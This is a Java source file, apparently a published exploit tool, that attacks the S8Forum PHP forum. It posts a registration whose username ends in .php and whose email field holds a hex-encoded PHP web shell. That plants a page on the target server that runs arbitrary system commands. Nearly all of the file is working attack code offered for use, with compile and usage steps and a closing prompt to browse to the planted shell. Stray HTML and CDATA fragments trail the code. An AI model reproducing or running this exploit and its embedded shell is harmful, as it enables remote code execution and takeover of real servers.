import java.io.*;
import java.net.*;
import java.util.*;
/**
* Title: s8Exploit
* Description: Exploit for s8Forum
* @author [Franky]
* @version 1.0
* Product : S8Forum
* Website : http://www.kellishaver.com/
* Problem : A security vulnerability in S8Forum
* This bug was discovered by Nasser.M.Sh
*
* This forum writen by PHP. It doesn't use database, instead
* that it creates new file with the name of the registered user then
* save it in (users) directory without extention.
* The programm doesn't check user's intries, like user name,email..etc!.
* This bug able us to run some commands on the server!.
*
* This program create a php file that emulate a shell with privileges of
* web server
* I've coded it in java because many script kiddy don't know jsdk and don't
* wonna download it to compile this program
*
* Compile instruction: javac s8Exploit.java
* Usage: java s8Exploit
*
*
*/
public class s8Exploit {
private static char hexDec(String hex){
int i = Integer.valueOf(hex,16).intValue();
char aChar = new Character((char)i).charValue();
return aChar;
}
private static String shellEncode(String sh){
StringTokenizer token = new StringTokenizer(sh,"%",false);
String tkn = "";
StringBuffer buff = new StringBuffer();
while(token.hasMoreTokens()){
tkn = token.nextToken();
buff.append(hexDec(tkn));
}
return buff.toString();
}
private static String mkfile(){
Random r = new Random();
int randInt = Math.abs(r.nextInt()) % 101;
return randInt + "";
}
private static void banner(){
System.out.println("");
System.out.println("s8Forum V 3.0 Exploit by [Franky]");
System.out.println("");
}
private static void usage(){
System.out.println("");
System.out.println("Usage: java s8Exploit ");
System.exit(0);
}
public static void main(String[] args) {
final String SHELLCODE = "%3c%3f%0d%0a%64%65%66%69%6e%65%28%27%50%48%50%53%48%" +
"45%4c%4c%5f%56%45%52%53%49%4f%4e%27%2c%09%27%31%2e%37%" +
"09%68%61%63%6b%65%64%27%29%3b%0d%0a%3f%3e%0d%0a%3c%68%" +
"74%6d%6c%3e%0d%0a%3c%68%65%61%64%3e%0d%0a%3c%74%69%74%" +
"6c%65%3e%3c%2f%74%69%74%6c%65%3e%0d%0a%3c%2f%68%65%61%" +
"64%3e%0d%0a%3c%62%6f%64%79%3e%0d%0a%3c%68%31%3e%50%48%" +
"50%09%53%68%65%6c%6c%09%3c%3f%09%65%63%68%6f%09%50%48%" +
"50%53%48%45%4c%4c%5f%56%45%52%53%49%4f%4e%09%3f%3e%3c%" +
"2f%68%31%3e%0d%0a%3c%3f%0d%0a%69%66%09%28%69%6e%69%5f%" +
"67%65%74%28%27%72%65%67%69%73%74%65%72%5f%67%6c%6f%62%" +
"61%6c%73%27%29%09%21%3d%09%27%31%27%29%09%7b%0d%0a%09%" +
"09%69%66%09%28%21%65%6d%70%74%79%28%24%48%54%54%50%5f%" +
"50%4f%53%54%5f%56%41%52%53%29%29%0d%0a%09%09%09%09%65%" +
"78%74%72%61%63%74%28%24%48%54%54%50%5f%50%4f%53%54%5f%" +
"56%41%52%53%29%3b%0d%0a%09%09%69%66%09%28%21%65%6d%70%" +
"74%79%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%29%" +
"29%0d%0a%09%09%09%09%65%78%74%72%61%63%74%28%24%48%54%" +
"54%50%5f%47%45%54%5f%56%41%52%53%29%3b%0d%0a%09%09%69%" +
"66%09%28%21%65%6d%70%74%79%28%24%48%54%54%50%5f%53%45%" +
"52%56%45%52%5f%56%41%52%53%29%29%0d%0a%09%09%09%09%65%" +
"78%74%72%61%63%74%28%24%48%54%54%50%5f%53%45%52%56%45%" +
"52%5f%56%41%52%53%29%3b%0d%0a%7d%0d%0a%3f%3e%0d%0a%3c%" +
"66%6f%72%6d%09%6e%61%6d%65%3d%22%6d%79%66%6f%72%6d%22%" +
"09%61%63%74%69%6f%6e%3d%22%3c%3f%09%65%63%68%6f%09%24%" +
"50%48%50%5f%53%45%4c%46%09%3f%3e%22%09%6d%65%74%68%6f%" +
"64%3d%22%70%6f%73%74%22%3e%0d%0a%3c%2f%62%3e%3c%2f%70%" +
"3e%0d%0a%3c%70%3e%43%6f%6d%6d%61%6e%64%3a%09%3c%69%6e%" +
"70%75%74%09%74%79%70%65%3d%22%74%65%78%74%22%09%6e%61%" +
"6d%65%3d%22%63%6f%6d%6d%61%6e%64%22%09%73%69%7a%65%3d%" +
"22%36%30%22%3e%0d%0a%3c%69%6e%70%75%74%09%6e%61%6d%65%" +
"3d%22%73%75%62%6d%69%74%5f%62%74%6e%22%09%74%79%70%65%" +
"3d%22%73%75%62%6d%69%74%22%09%76%61%6c%75%65%3d%22%45%" +
"78%65%63%75%74%65%09%43%6f%6d%6d%61%6e%64%22%3e%3c%2f%" +
"70%3e%0d%0a%3c%70%3e%45%6e%61%62%6c%65%09%3c%63%6f%64%" +
"65%3e%73%74%64%65%72%72%3c%2f%63%6f%64%65%3e%2d%74%72%" +
"61%70%70%69%6e%67%3f%09%3c%69%6e%70%75%74%09%74%79%70%" +
"65%3d%22%63%68%65%63%6b%62%6f%78%22%09%6e%61%6d%65%3d%" +
"22%73%74%64%65%72%72%22%3e%3c%2f%70%3e%0d%0a%3c%74%65%" +
"78%74%61%72%65%61%09%63%6f%6c%73%3d%22%38%30%22%09%72%" +
"6f%77%73%3d%22%32%30%22%09%72%65%61%64%6f%6e%6c%79%3e%" +
"0d%0a%3c%3f%0d%0a%69%66%09%28%21%65%6d%70%74%79%28%24%" +
"63%6f%6d%6d%61%6e%64%29%29%09%7b%0d%0a%09%09%69%66%09%" +
"28%24%73%74%64%65%72%72%29%09%7b%0d%0a%09%09%09%09%24%" +
"74%6d%70%66%69%6c%65%09%3d%09%74%65%6d%70%6e%61%6d%28%" +
"27%2f%74%6d%70%27%2c%09%27%70%68%70%73%68%65%6c%6c%27%" +
"29%3b%0d%0a%09%09%09%09%24%63%6f%6d%6d%61%6e%64%09%2e%" +
"3d%09%22%09%31%3e%09%24%74%6d%70%66%69%6c%65%09%32%3e%" +
"26%31%3b%09%22%09%2e%0d%0a%09%09%09%09%22%63%61%74%09%" +
"24%74%6d%70%66%69%6c%65%3b%09%72%6d%09%24%74%6d%70%66%" +
"69%6c%65%22%3b%0d%0a%09%09%7d%09%65%6c%73%65%09%69%66%" +
"09%28%24%63%6f%6d%6d%61%6e%64%09%3d%3d%09%27%6c%73%27%" +
"29%09%7b%0d%0a%09%09%09%09%24%63%6f%6d%6d%61%6e%64%09%" +
"2e%3d%09%27%09%2d%46%27%3b%0d%0a%09%09%7d%0d%0a%09%09%" +
"73%79%73%74%65%6d%28%24%63%6f%6d%6d%61%6e%64%29%3b%0d%" +
"0a%7d%0d%0a%3f%3e%0d%0a%3c%2f%74%65%78%74%61%72%65%61%" +
"3e%0d%0a%3c%2f%66%6f%72%6d%3e%0d%0a%3c%73%63%72%69%70%" +
"74%09%6c%61%6e%67%75%61%67%65%3d%22%4a%61%76%61%53%63%" +
"72%69%70%74%22%09%74%79%70%65%3d%22%74%65%78%74%2f%6a%" +
"61%76%61%73%63%72%69%70%74%22%3e%0d%0a%64%6f%63%75%6d%" +
"65%6e%74%2e%66%6f%72%6d%73%5b%30%5d%2e%63%6f%6d%6d%61%" +
"6e%64%2e%66%6f%63%75%73%28%29%3b%0d%0a%3c%2f%73%63%72%" +
"69%70%74%3e%0d%0a%3c%68%72%3e%0d%0a%3c%69%3e%43%6f%70%" +
"79%72%69%67%68%74%09%26%63%6f%70%79%3b%09%32%30%30%30%" +
"26%6e%64%61%73%68%3b%32%30%30%32%2c%09%3c%61%0d%0a%68%" +
"72%65%66%3d%22%6d%61%69%6c%74%6f%3a%67%69%6d%70%73%74%" +
"65%72%40%67%69%6d%70%73%74%65%72%2e%63%6f%6d%22%3e%4d%" +
"61%72%74%69%6e%09%47%65%69%73%6c%65%72%3c%2f%61%3e%2e%" +
"09%47%65%74%09%74%68%65%09%6c%61%74%65%73%74%0d%0a%76%" +
"65%72%73%69%6f%6e%09%61%74%09%3c%61%09%68%72%65%66%3d%" +
"22%68%74%74%70%3a%2f%2f%77%77%77%2e%67%69%6d%70%73%74%" +
"65%72%2e%63%6f%6d%22%3e%77%77%77%2e%67%69%6d%70%73%74%" +
"65%72%2e%63%6f%6d%3c%2f%61%3e%2e%3c%2f%69%3e%0d%0a%3c%" +
"2f%62%6f%64%79%3e%0d%0a%3c%2f%68%74%6d%6c%3e%0d%0a";
String hostname = "";
String path = "";
String tmp = "";
int port = 80;
banner();
if (args.length != 2){
usage();
}
hostname = args[0];
path = args[1];
try{
System.out.println("Create remote socket...please wait...");
URL url = new URL("http://"+ hostname +":80"+ path + "/register.php");
URLConnection conn = url.openConnection();
conn.setDoOutput(true);
InetAddress addr = InetAddress.getByName(hostname);
Socket socket = new Socket(addr, port);
System.out.println("CONNECT!");
tmp = shellEncode(SHELLCODE);
String shelldata = URLEncoder.encode(tmp,"UTF-8");
String fpre = mkfile();
String postdata = URLEncoder.encode("mode","UTF-8") + "=" + URLEncoder.encode("registration_confirm","UTF-8")+"&"+
URLEncoder.encode("uname","UTF-8") + "=" + URLEncoder.encode("franky"+fpre+"code.php","UTF-8") + "&" +
URLEncoder.encode("passwd","UTF-8") + "=" + URLEncoder.encode("franky"+fpre+"code.","UTF-8") + "&"+
URLEncoder.encode("passwd1","UTF-8") + "=" + URLEncoder.encode("franky"+fpre+"code.","UTF-8") + "&"+
URLEncoder.encode("email","UTF-8") + "=" + shelldata;
System.out.println("Sending exploit...");
OutputStreamWriter wr = new OutputStreamWriter(conn.getOutputStream());
wr.write(postdata);
wr.flush();
System.out.print("DONE!");
BufferedReader rd = new BufferedReader(new InputStreamReader(conn.getInputStream()));
String line;
while ((line = rd.readLine()) != null) {
// System.out.println(line);
}
wr.close();
rd.close();
System.out.println("Ok, point your browser at http://"+hostname+path+"users/franky"+fpre+"code.php");
}catch(UnknownHostException e){
System.out.print("Exploit faild: Unknown host "+hostname);
System.exit(1);
}catch(IOException e){
System.out.println("Exploit faild: IOException:" + e.toString());
System.exit(1);
}
}
} |
| |
|
| <![CDATA[<span id="7ztzv"></span>]]><![CDATA[<form id="7ztzv"></form>]]> | | |
|
<![CDATA[<span id="7ztzv"></span>]]> |
|
|
|
|
<![CDATA[<address id="7ztzv"></address>]]>
| |